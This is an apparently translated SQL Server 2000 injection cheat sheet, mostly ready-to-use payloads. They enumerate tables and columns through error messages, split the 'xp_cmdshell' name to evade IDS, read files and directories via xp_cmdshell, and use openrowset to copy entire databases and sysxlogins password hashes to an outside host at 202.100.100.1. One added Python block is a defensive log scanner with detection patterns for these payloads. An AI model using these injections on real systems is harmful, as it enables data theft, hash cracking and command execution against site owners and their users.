SQL Server 2000 Injection Protection Encyclopedia (ii) Vulnerability Research


Traditional query construction:
select * from news where id=... and topic=... and ...
admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass<>'
select 123;--
;use master;--
a' or name like 'fff%';-- shows a user named FFFF.
' and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='FFFF';--

Description
The statement above fetches the name of the first user table in the database and writes it into the email field of the FFFF user record. By viewing FFFF's profile you learn that the first user table is called ad.
Next, obtain the id of that table from its name:
FFFF';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='FFFF';--

The name of the second table can be obtained as follows:
FFFF';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='FFFF';--
FFFF';update [users] set email=(select top 1 count(id) from password) where name='FFFF';--
FFFF';update [users] set email=(select top 1 pwd from password where id=2) where name='FFFF';--

FFFF';update [users] set email=(select top 1 name from password where id=2) where name='FFFF';--

exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server'
sp_addextendedproc 'xp_webserver','c:\temp\xp_foo.dll'

The extended stored procedure can then be invoked in the usual way:
exec xp_webserver

Once the extended stored procedure has been run, it can be removed like this:
sp_dropextendedproc 'xp_webserver'

insert into users values(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--

insert into users values(667,123,123,0xffff)--

insert into users values(123, 'admin''--', 'password', 0xffff)--

;and user>0
;;and (select count(*) from sysobjects)>0
;;and (select count(*) from msysobjects)>0 -- succeeds only against an Access database

Common injection patterns:
(A) id=49. The parameter of this kind of injection is numeric, and the SQL statement looks roughly like this:
select * from [table name] where [field]=49
The injected parameter is id=49 and [query condition], so the generated statement becomes:
select * from [table name] where [field]=49 and [query condition]

(B) class=series. The parameter is a character type, and the original SQL statement looks roughly like this:
select * from [table name] where [field]='series'
The injected parameter is class=series' and [query condition] and ''=', so the generated statement becomes:
select * from [table name] where [field]='series' and [query condition] and ''=''

(C) Search parameters that are not filtered, such as keyword=keyword. The original SQL statement looks roughly like this:
select * from [table name] where [field] like '%keyword%'
The injected parameter is keyword=' and [query condition] and '%25'=, so the generated statement becomes:
select * from [table name] where [field] like '%' and [query condition] and '%'='%'
;;and (select top 1 name from sysobjects where xtype='U' and status>0)>0
sysobjects is the SQL Server system table that records all of the database's objects (tables, views, constraints and so on); xtype='U' and status>0 selects the tables created by users. The statement above takes the first such table name and compares it with 0, so that the resulting conversion error message exposes the table name.

;;and (select top 1 col_name(object_id('table name'),1) from sysobjects)>0
Once a table name is known from the previous step, object_id('table name') returns the table's internal id, and col_name(table id, 1) returns the name of its first column; replacing 1 with 2, 3, 4, ... yields the table's column names one by one.

Post.htm content (mainly to make input convenient):

<iframe name=p src=# width=800 height=350 frameborder=0></iframe>
<br>
<form action=http://test.com/count.asp target=p>
<input name="id" value="1552;update AAA set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--" style="width:750">
<input type=submit value=">>>">
<input type=hidden name=fno value="2, 3">
</form>

Get the name of the data table:
id=1552;update AAA set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--

This writes the first table name into the aaa field.

Having read the first table name, the second is read the same way by appending and name<>'the table name just obtained' to the condition:
id=1552;update AAA set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'table name just obtained');--

Then id=1552 and exists(select * from AAA where aaa>5)

reads out the second table name; repeat this until no more names are returned.

Read the fields like this:
id=1552;update AAA set aaa=(select top 1 col_name(object_id('table name'),1));--

Then id=1552 and exists(select * from AAA where aaa>5) raises an error that reveals the field name.
id=1552;update AAA set aaa=(select top 1 col_name(object_id('table name'),2));--
Then id=1552 and exists(select * from AAA where aaa>5) raises an error that reveals the next field name.

Advanced tips:

[Get the data table name] [Update a field's value to the table name, then read that field back to obtain the table name]
update [table name] set [field]=(select top 1 name from sysobjects where xtype='u' and status>0 [and name<>'table name already obtained', adding one such clause for each table found]) [where condition]
select top 1 name from sysobjects where xtype='u' and status>0 and name not in ('table1','table2',...)

Creating database administrator and system administrator accounts through a SQL Server injection vulnerability [the current account must be in the sysadmin group]

[Get the data table's field names] [Update a field's value to the field name, then read that field back to obtain the field name]
update [table name] set [field]=(select top 1 col_name(object_id('data table to query'), column ordinal, e.g. 1)) [where condition]

Bypassing IDS detection [using variables]:
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
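
As an added example (not from the original text), this Python scans constructed IIS-style log lines for the payload shapes shown on this page, including the variable-built procedure name used above to evade IDS signatures; the log layout, indicator labels and sample lines are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote_plus

# Object and procedure names that appear in this page's payloads, matched after URL decoding.
SUSPECT_NAMES = ("sysobjects", "syscolumns", "sysxlogins", "openrowset", "xp_cmdshell",
                 "xp_dirtree", "xp_subdirs", "xp_availablemedia", "xp_servicecontrol",
                 "sp_addextendedproc", "is_srvrolemember", "is_member")
NAME_RE = re.compile(r"\b(?:" + "|".join(map(re.escape, SUSPECT_NAMES)) + r")\b")
STACKED_RE = re.compile(r";\s*(?:declare|update|insert|create|use|exec|select)\b")  # stacked statement
COMMENT_RE = re.compile(r"--")                                                      # trailing comment
INDIRECT_EXEC_RE = re.compile(r"declare\s+@\w+\s+\w+.*?\bexec\s+@\w+")              # exec via variable

def normalise(query_string):
    # Decode as the ASP page would (+ is a space), lower-case, then rejoin 'xp_'+'cmdshell'
    # style fragments so the IDS-bypass trick on the page does not hide the procedure name.
    q = unquote_plus(query_string).lower()
    return re.sub(r"'\s*\+\s*'", "", q)

def classify(query_string):
    """Return a tuple of indicator labels found in one decoded query string; empty if none."""
    q = normalise(query_string)
    checks = (("system-object", NAME_RE), ("stacked-query", STACKED_RE),
              ("comment-terminator", COMMENT_RE), ("indirect-exec", INDIRECT_EXEC_RE))
    return tuple(label for label, rx in checks if rx.search(q))

# Constructed W3C-style IIS lines (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status);
# the queries reuse the shapes shown on this page.
SAMPLE_LOG = [
    "2004-03-01 10:00:01 10.0.0.5 GET /down/list.asp id=1 200",
    "2004-03-01 10:00:02 10.0.0.5 GET /down/list.asp class=drama+series 200",
    "2004-03-01 10:00:03 10.0.0.7 GET /down/list.asp id=1%20and%201=(select%20is_srvrolemember('sysadmin'));-- 500",
    "2004-03-01 10:00:04 10.0.0.7 GET /count.asp id=1552;update%20AAA%20set%20aaa=(select%20top%201%20name"
    "%20from%20sysobjects%20where%20xtype='u'%20and%20status>0);-- 500",
    "2004-03-01 10:00:05 10.0.0.7 GET /down/list.asp id=1;declare%20@a%20sysname%20set%20@a='xp_'%2B'cmdshell'"
    "%20exec%20@a%20'dir%20c:%5C' 500",
]

def scan_log(lines):
    """Return [(client_ip, uri_stem, indicators)] for each request carrying at least one indicator."""
    flagged = []
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue                      # not a request line in the expected layout
        hits = classify(fields[5])
        if hits:
            flagged.append((fields[2], fields[4], hits))
    return flagged

if __name__ == "__main__":
    for entry in scan_log(SAMPLE_LOG):
        print(entry)
```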

1. Opening a remote database
Basic syntax:
select * from openrowset('SQLOLEDB','server=servername;uid=sa;pwd=apachy_123','select * from table1')

Parameters: (1) the OLE DB provider name

(2) the connection string, whose parameters can specify any address and port to connect to, e.g.
select * from openrowset('SQLOLEDB','uid=sa;pwd=apachy_123;NETWORK=DBMSSOCN;address=202.100.100.1,1433','select * from table')

To replicate the target host's entire database, first establish a connection from the target host to the database on your own machine (how to open a remote connection from the target host was shown just above), then insert all of the remote tables into local tables.

Basic syntax:
insert into openrowset('SQLOLEDB','server=servername;uid=sa;pwd=apachy_123','select * from table1') select * from table2

This statement copies all of the data in table2 on the target host into table1 in the remote database. In practice, the IP address and port in the connection string are adjusted to point wherever needed, e.g.:
insert into openrowset('SQLOLEDB','uid=sa;pwd=apachy_123;NETWORK=DBMSSOCN;address=202.100.100.1,1433','select * from table1') select * from table2

insert into openrowset('SQLOLEDB','uid=sa;pwd=hack3r;NETWORK=DBMSSOCN;address=202.100.100.1,1433','select * from _sysdatabases') select * from master.dbo.sysdatabases

insert into openrowset('SQLOLEDB','uid=sa;pwd=hack3r;NETWORK=DBMSSOCN;address=202.100.100.1,1433','select * from _sysobjects') select * from user_database.dbo.sysobjects

insert into openrowset('SQLOLEDB','uid=sa;pwd=apachy_123;NETWORK=DBMSSOCN;address=202.100.100.1,1433','select * from _syscolumns') select * from user_database.dbo.syscolumns

You can then inspect the target host's database structure from the local database, after which copying the tables themselves is straightforward:
insert into openrowset('SQLOLEDB','uid=sa;pwd=apachy_123;NETWORK=DBMSSOCN;address=202.100.100.1,1433','select * from table1') select * from database.table1

insert into openrowset('SQLOLEDB','uid=sa;pwd=apachy_123;NETWORK=DBMSSOCN;address=202.100.100.1,1433','select * from table2') select * from database.table2

......

3. Copying hashes

This is really an extended application of the database replication above. The password hashes of logins are stored in sysxlogins. The method is as follows:
insert into openrowset('SQLOLEDB','uid=sa;pwd=apachy_123;NETWORK=DBMSSOCN;address=202.100.100.1,1433','select * from _sysxlogins') select * from database.dbo.sysxlogins

Once the hashes are obtained they can be brute-forced, which takes some luck and a lot of time.

Ways to traverse a directory:
First create a temporary table, temp:
5';create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
5';insert temp exec master.dbo.xp_availablemedia;-- gets all current drives
5';insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- gets the list of subdirectories
5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- gets the directory tree of all subdirectories and inserts it into the temp table

5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- views the contents of a file
5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\*.asp /s /a';--
5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc';--

5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- (xp_dirtree can be executed with public permission)
Check the role membership of the current account:
Statement 1: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('sysadmin'));--
Statement 2: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('serveradmin'));--
Statement 3: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('setupadmin'));--
Statement 4: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('securityadmin'));--
Statement 5: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('diskadmin'));--
Statement 6: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_srvrolemember('bulkadmin'));--
Statement 7: http://www.xxxxx.com/down/list.asp?id=1 and 1=(select is_member('db_owner'));--
Write the paths to a table:
http://www.xxxxx.com/down/list.asp?id=1;create table dirs (paths varchar(255), id int)--
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'c:\'--
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)--
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in ('@Inetpub'))--
Statement: http://www.xxxxx.com/down/list.asp?id=1;create table dirs1 (paths varchar(255), id int)--
Statement: http://www.xxxxx.com/down/list.asp?id=1;insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--
Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)--
